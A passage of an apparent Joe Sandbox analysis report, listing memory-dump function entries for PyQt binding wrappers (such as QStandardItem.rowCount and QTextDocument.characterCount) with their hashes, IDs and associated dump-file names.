                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29b20e0a43de06acdb7bd249bfc9ce62130d5d90824c6d40dc7d9a297fb3508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA011A36A09A46D1EB109F11E8496A933E4FB44BD4F914032C99E47320EF7DE669C344
                                                                                                                                                                                                                                          Function 00007FF89D9AFA20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rowCount@FromItem@@LongLong_Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$rowCount$rowCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3772066395-2180684922
                                                                                                                                                                                                                                          • Opcode ID: c2610a421aa1ed75484964279e3eb4bbccaa3bc8dacf14eb66d94b3fb26af3c6
                                                                                                                                                                                                                                          • Instruction ID: 70b4771da85d19d79370f7715f0d01f2e305937d11037d2eedfc2304d573fa08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2610a421aa1ed75484964279e3eb4bbccaa3bc8dacf14eb66d94b3fb26af3c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45011A36A08F46C2EB109F61E8496A933A4FB44FD4F914032D98E43320EF7CE559C344
                                                                                                                                                                                                                                          Function 00007FF89D95FE20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$bottomBorder$bottomBorder(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-3667237825
                                                                                                                                                                                                                                          • Opcode ID: 78779074f744aa4e6240df6299e699332a77720c948829f0b1018ab9e57a0db3
                                                                                                                                                                                                                                          • Instruction ID: b81b8ea0489e0cd2dfc6b393c7819c0c115f693abbf4a0a9f6d980425db64fb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78779074f744aa4e6240df6299e699332a77720c948829f0b1018ab9e57a0db3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C011E37A08A46D1EB109F51E8496A933E4FB44FD4F918032DA9E03320EF7DE959C344
                                                                                                                                                                                                                                          Function 00007FF89D955E30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?characterCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$characterCount$characterCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 881620296-2125918123
                                                                                                                                                                                                                                          • Opcode ID: a0ac70d635bbda4c68ef120a2f66dfa3ff83501cb7fbda3d90d02dc7b5a3fb7a
                                                                                                                                                                                                                                          • Instruction ID: 1e57262eb5d07dc02225688186edcf08c6703033f04d55b23b54f0d46a234fb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ac70d635bbda4c68ef120a2f66dfa3ff83501cb7fbda3d90d02dc7b5a3fb7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A76A08A46C1EB109F61E8496A933A8FB44FD0F914032CA8E47324EF7CE569C384
                                                                                                                                                                                                                                          Function 00007FF89D95FA00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?quality@FromLongLong_Picture
                                                                                                                                                                                                                                          • String ID: QPictureIO$quality$quality(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3929030510-1341373197
                                                                                                                                                                                                                                          • Opcode ID: 6959362fe077fbb36eff491c4af0609a87587c4530a19ab08087fe3f26c9a111
                                                                                                                                                                                                                                          • Instruction ID: c898a4debaba1d2193de1ade8a9da8e56e8e9824dbd3d7db3f367e1cdbfa8735
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6959362fe077fbb36eff491c4af0609a87587c4530a19ab08087fe3f26c9a111
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18012C36A08B46C2EB20DF61E8496A933A4FB44F90F914032D99E43320EF7DE659C384
                                                                                                                                                                                                                                          Function 00007FF89D973D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?column@Cell@@FromLongLong_TableText
                                                                                                                                                                                                                                          • String ID: QTextTableCell$column$column(self) -> int
                                                                                                                                                                                                                                          • API String ID: 799361229-1877074223
                                                                                                                                                                                                                                          • Opcode ID: 808c914b9cbabb4b5f6ffa9b6ae6735847d7f7ad31da394032f5c6c03645a777
                                                                                                                                                                                                                                          • Instruction ID: a6322d07b18c3890c0fc7f5959d9ed4324c68f739d41194348d974a85b92c853
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 808c914b9cbabb4b5f6ffa9b6ae6735847d7f7ad31da394032f5c6c03645a777
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63012C77A08B46D1EB109F61E8496A933E4FB44F90F914032C99E43324EF7DE65AC344
                                                                                                                                                                                                                                          Function 00007FF89D951DE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongRotating@Transform@@
                                                                                                                                                                                                                                          • String ID: QTransform$isRotating$isRotating(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2918634833-3786752346
                                                                                                                                                                                                                                          • Opcode ID: 573c8a070a5d55860e69e2bb6c31ffbd930a20e21f845455d9b0d6ae7f4998c0
                                                                                                                                                                                                                                          • Instruction ID: 6dbf57fe292d37f2fbd7237abc0c35b9550e50c3a6e1b01465a864eb97c72edc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 573c8a070a5d55860e69e2bb6c31ffbd930a20e21f845455d9b0d6ae7f4998c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201EC36A08A4AD1EB109F61E8496A933E4FB44FD5F914032D99E47320EF7DF669C384
                                                                                                                                                                                                                                          Function 00007FF89D993DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontLetterSpacing$fontLetterSpacing(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-72043748
                                                                                                                                                                                                                                          • Opcode ID: 4dae8562fbf63020d46b3a67a3fc7f7233b56816a713172a21d55fec755271c8
                                                                                                                                                                                                                                          • Instruction ID: ebddd69602ee38c16bfc467c470c5937855ee9bd4c7aedb1ab568afb07d85684
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dae8562fbf63020d46b3a67a3fc7f7233b56816a713172a21d55fec755271c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601DA37A08A46D1EB109F61E8496A933B4FB44FD4F914032DA9E47320EF7DE659C384
                                                                                                                                                                                                                                          Function 00007FF89D9ADD00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
